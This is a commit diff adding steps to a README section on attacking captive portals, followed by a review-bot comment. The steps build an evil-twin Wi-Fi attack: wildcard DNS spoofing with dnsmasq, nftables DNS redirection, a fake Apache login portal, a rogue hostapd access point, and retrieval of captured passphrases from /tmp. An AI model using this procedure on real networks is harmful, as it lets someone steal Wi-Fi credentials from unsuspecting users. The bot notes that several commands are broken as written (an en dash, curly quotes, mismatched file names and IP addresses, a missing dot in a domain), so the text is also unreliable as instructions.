Commit 2b2557b

author
alenperic
authored
Update README.md
Finished attacking captive portals section
1 parent f5dc7c9 commit 2b2557b

1 file changed

+111
-0
lines changed

README.md

@@ -329,6 +329,117 @@ Configure the login page to redirect to `login_check.php`:
329329
sudo mousepad /var/www/html/portal/login_check.php
330330
```
331331

332+
### 9. Assign an IP address and activate the interface:
333+
334+
```bash
335+
sudo ip addr add 192.168.87.1/24 dev wlan0
336+
sudo ip link set wlan0 up
337+
```
338+
339+
### 10. Ensure dnsmasq is installed:
340+
341+
```bash
342+
sudo apt install dnsmasq
343+
```
344+
345+
### 11. Create the DHCP config file at `/home/kali/dnsmasq.conf` and add spoofing entries for top-level domains:
346+
347+
```bash
348+
address=/com/192.168.0.1
349+
address=/org/192.168.0.1
350+
address=/net/192.168.0.1
351+
```
352+
353+
### 12. For Windows 7 & 10 captive portal detection, add:
354+
355+
```bash
356+
address=/dns.msftncsicom/131.107.255.255
357+
```
358+
359+
### 13. Start dnsmasq with the config file:
360+
361+
```bash
362+
sudo dnsmasq –conf-file=dnsmasq.com
363+
```
364+
365+
### 14. Verify if dnsmasq is running successfully:
366+
367+
```bash
368+
sudo tail /var/log/syslog | grep dnsmasq
369+
```
370+
371+
### 15. Install nftables:
372+
373+
```bash
374+
sudo apt install nftables
375+
```
376+
377+
### 16. Add required rules:
378+
379+
```bash
380+
sudo nft add table ip nat
381+
sudo nft ‘add chain ip nat PREROUTING { type nat hook prerouting priority dstnat; policy; accept; }’
382+
sudo nft add rule ip nat PREROUTING iifname “wlan0” udp dport 53 counter redirect to :53
383+
```
384+
385+
### 17. Modify Apache configuration:
386+
387+
```bash
388+
sudo mousepad /etc/apache2/sites-enabled/000-default.conf
389+
```
390+
391+
### 18. Enable necessary modules and restart Apache:
392+
393+
```bash
394+
sudo a2enmod rewrite && sudo a2enmod alias
395+
sudo systemctl restart apache2
396+
```
397+
398+
### 19. Check the portal by navigating to:
399+
400+
```bash
401+
Firefox 127.0.0.1/portal/index.php
402+
```
403+
404+
### 20. Install hostapd and edit the configuration:
405+
406+
```bash
407+
sudo apt install hostapd && mousepad hostapd.conf
408+
```
409+
410+
### 21. Create and run a 802.11n AP:
411+
412+
```bash
413+
sudo hostapd -B hostapd.conf
414+
```
415+
416+
### 22. Monitor the logs in two separate terminals:
417+
418+
- Terminal 1:
419+
420+
```bash
421+
sudo tail -f /var/log/syslog | grep -E ‘(dnsmasq|hostapd)’
422+
```
423+
424+
- Terminal 2:
425+
426+
```bash
427+
sudo tail -f /var/log/apache2/access.log
428+
```
429+
430+
### 23. Search for passphrase files in `/tmp/`:
431+
432+
```bash
433+
sudo find /tmp/ -iname passphrase.txt
434+
```
435+
436+
### 24. Read the contents of the passphrase file:
437+
438+
```bash
439+
sudo cat /tmp/systemd-private-b37…aef-apache2.service-b...i/tmp/passphrase.txt
440+
```
441+
442+
332443
## Information Discovery Example
333444
```bash
334445
- ESSID of JesusIsTheWay
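
Review bot: Several of the added commands will not run as pasted because of typographic characters and names that do not match between steps. In step 13, `sudo dnsmasq –conf-file=dnsmasq.com` uses an en dash where `--` is needed and names `dnsmasq.com`, while step 11 creates `/home/kali/dnsmasq.conf`. In step 16 the chain definition and the `iifname` value are wrapped in curly quotes (as is the `grep -E` pattern in step 22), and `policy; accept;` should read `policy accept;`. In step 12, `dns.msftncsicom` is missing the dot before `com`. Step 9 assigns 192.168.87.1 to wlan0 but the `address=` entries in step 11 point at 192.168.0.1, so either make the two agree or explain the difference. Step 11 is titled as a DHCP config yet the block shows no DHCP settings, and steps 17 and 20 open an editor without showing what goes in the file, so the README is missing documentation at those points. Step 19 should use lowercase `firefox`.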
